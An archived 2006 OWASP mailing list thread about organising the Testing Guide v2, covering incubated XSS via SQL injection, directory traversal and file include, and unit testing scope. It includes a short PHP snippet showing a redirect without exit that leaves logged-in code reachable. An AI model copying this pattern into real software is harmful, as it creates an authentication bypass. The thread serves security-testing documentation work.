[Owasp-testing] Brainstorming about the new Index

Daniel Cuthbert daniel.cuthbert at owasp.org
Fri Oct 13 10:20:53 EDT 2006


nope, seems something isnt happy with our version of wiki and mac  
support

Andrew, you use a mac, you seen this before?
On 13 Oct 2006, at 20:11, Eoin wrote:

> Yep, had this before, dont turn on "remember me" and clear your cache.
> that seems to solve the problem
>
> On 13/10/06, Daniel Cuthbert < daniel.cuthbert at owasp.org> wrote:
> Anyone else having a issue with the Wiki?
> seems once i go through the authentication process, the site returns
> a blank page
>
> confused!
> On 13 Oct 2006, at 18:10, Matteo Meucci wrote:
>
> > I've talked about "4.2 Information Gathering" and " 4.8  
> Infrastructure
> > and configuration Testing" with Carlo and Stefano.
> > (http://www.owasp.org/index.php/
> > OWASP_Testing_Guide_v2_Table_of_Contents)
> >
> > May be we can merge these like that (deleting par.4.8):
> >
> > 4.2 Information Gathering
> > 4.2.1 Spidering and googling
> > 4.2.2 Analisys of error code
> > 4.2.3 Infrastructure configuration management testing
> > SSL/TLS Testing
> > 4.2.4 Application configuration management testing
> > File extensions handling
> > Old, backup and unreferenced files
> >
> > What is your opinion?
> > Mat
> >
> >
> > On 10/13/06, Matteo Meucci <matteo.meucci at gmail.com> wrote:
> >> Perfect.
> >> Thank you Stefano, I've added:
> >> 4.4.4 Directory traversal/file include
> >>
> >> What about your second idea...where can we insert this item?
> >>
> >> Mat
> >>
> >> On 10/13/06, Stefano Di Paola <wisec at wisec.it > wrote:
> >>> Just a couple of things that come to my mind (thanks to Matteo and
> >>> Alberto)...
> >>>
> >>> Data Validation Testing chapter misses a little par. about
> >>> directory traversal/local file include and remote file include.
> >>>
> >>> Another point is about athentication and authorization chapter,
> >>> on pages
> >>> which miss to exit on a redirection when they find the login/
> >>> passwd are
> >>> wrong.
> >>> An example below in Php:
> >>> <?
> >>> if(islogged())
> >>> header("Location : redir.php")
> >>> // without exit and then login page follows
> >>> logged-in code..-.
> >>> ?>
> >>>
> >>> Maybe in this cases a paragraph is worth writing to cover the
> >>> issue and
> >>> to point out the use of command line raw requests like curl and
> >>> related.
> >>>
> >>> Stefano
> >>>
> >>>
> >>>
> >>> On gio, 2006-10-12 at 11:51 +0200, Matteo Meucci wrote:
> >>>> Yes,
> >>>> I think you are right: this paragraph already exists.
> >>>> look at:
> >>>> (http://www.owasp.org/index.php/
> >>>> OWASP_Testing_Guide_v2_Table_of_Contents)
> >>>> 4.6 Data Validation Testing 0% TD
> >>>> 4.6.1 Cross site scripting 0% TD
> >>>> 4.6.1.1 Incubated attacks 0% TD
> >>>>
> >>>> Ariel may be says that Incubated attacks are a combination of
> >>>> SQL Inj
> >>>> and XSS, but we can reasonably affirm that is a particular XSS
> >>>> attack.
> >>>> In the same paragraph we can show an example that how a XSS Inc
> >>>> Attack
> >>>> works exploiting an SQL Inj vulnerability.
> >>>> Right?
> >>>>
> >>>> Mat
> >>>>
> >>>>
> >>>>
> >>>> On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
> >>>>> Hi,
> >>>>> incubated attacks are important enough to warrant a section
> >>>>> under XSS. It is
> >>>>> another varient of XSS.
> >>>>> Metteo what do you think?
> >>>>>
> >>>>>
> >>>>>
> >>>>> On 11/10/06, Ariel Waissbein < wata.34mt at coresecurity.com>  
> wrote:
> >>>>>> Hi all,
> >>>>>>
> >>>>>> my first post and 2 cents here:
> >>>>>>
> >>>>>> I guess we should make a difference between the techniques of
> >>>>>> unit
> >>>>>> testing and the results of UT. Even if UT can be used to...  
> e.g.,
> >>>>>> discover BO or SQL-injection vulns.
> >>>>>>
> >>>>>> Although, I noticed that there is an Appendix for fuzzing
> >>>>>> which is
> >>>>>> another technique for discovering (some) vulnerabilities.
> >>>>>>
> >>>>>>
> >>>>>> A new question: imagine the following situation: The pen tester
> >>>>>> discovers a SQL-injection vulnerability in a webapp he is
> >>>>>> auditing. This
> >>>>>> vuln. allows him to store some javascript in the Db and  
> therefore
> >>>>>> perpetrate a XSS attack (incubated) on the users of this
> >>>>>> webapp.  My
> >>>>>> question is where do we describe this attacks? (I think they  
> are
> >>>>>> important enough to be included somewhere.)
> >>>>>>
> >>>>>> Cheers,
> >>>>>> Ariel
> >>>>>>
> >>>>>> Eoin Keary wrote:
> >>>>>>> Hi,
> >>>>>>>
> >>>>>>> Question:
> >>>>>>> Do we want to get into Unit Testing and SDLC methodology in
> >>>>>>> this guide?
> >>>>>>> I thought they would be more suite to Andrews dev guide or
> >>>>>>> the code
> >>>>>>> review project.
> >>>>>>> unit testing is related to testing small blocks of a syaytem
> >>>>>>> individually and hence a development phase done prior to
> >>>>>>> system and
> >>>>>>> integration testing.
> >>>>>>> The Guide currently focuses on penetration testing which is
> >>>>>>> "After the
> >>>>>>> Fact" testing and not really one until the system in  
> developed.
> >>>>>>>
> >>>>>>> What y'all think?
> >>>>>>>
> >>>>>>> Eoin
> >>>>>>>
> >>>>>> _______________________________________________
> >>>>>> Owasp-testing mailing list
> >>>>>> Owasp-testing at lists.owasp.org
> >>>>>> http://lists.owasp.org/mailman/listinfo/owasp-testing
> >>>>>>
> >>>>>
> >>>>>
> >>>>>
> >>>>> --
> >>>>> Eoin Keary OWASP - Ireland
> >>>>> http://www.owasp.org/local/ireland.html
> >>>>>  http://www.owasp.org/index.php/OWASP_Testing_Project
> >>>>> http://www.owasp.org/index.php/OWASP_Code_Review_Project
> >>>>> _______________________________________________
> >>>>> Owasp-testing mailing list
> >>>>> Owasp-testing at lists.owasp.org
> >>>>> http://lists.owasp.org/mailman/listinfo/owasp-testing
> >>>>>
> >>>>>
> >>>>>
> >>>>
> >>>
> >>>
> >>>
> >>
> >>
> >> --
> >> Matteo Meucci
> >> OWASP-Italy Chair, CISSP, CISA
> >> site: http://www.owasp.org/index.php/Italy
> >> mail: matteo.meucci at owasp.org
> >> ml: http://lists.owasp.org/mailman/listinfo/owasp-italy
> >>
> >
> >
> > --
> > Matteo Meucci
> > OWASP-Italy Chair, CISSP, CISA
> > site: http://www.owasp.org/index.php/Italy
> > mail: matteo.meucci at owasp.org
> > ml: http://lists.owasp.org/mailman/listinfo/owasp-italy
> > _______________________________________________
> > Owasp-testing mailing list
> > Owasp-testing at lists.owasp.org
> > http://lists.owasp.org/mailman/listinfo/owasp-testing
>
> _______________________________________________
> Owasp-testing mailing list
> Owasp-testing at lists.owasp.org
> http://lists.owasp.org/mailman/listinfo/owasp-testing
>
>
>
> -- 
> Eoin Keary OWASP - Ireland
> http://www.owasp.org/local/ireland.html
> http://www.owasp.org/index.php/OWASP_Testing_Project
> http://www.owasp.org/index.php/OWASP_Code_Review_Project

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-testing/attachments/20061013/1beea150/attachment-0002.html 


More information about the Owasp-testing mailing list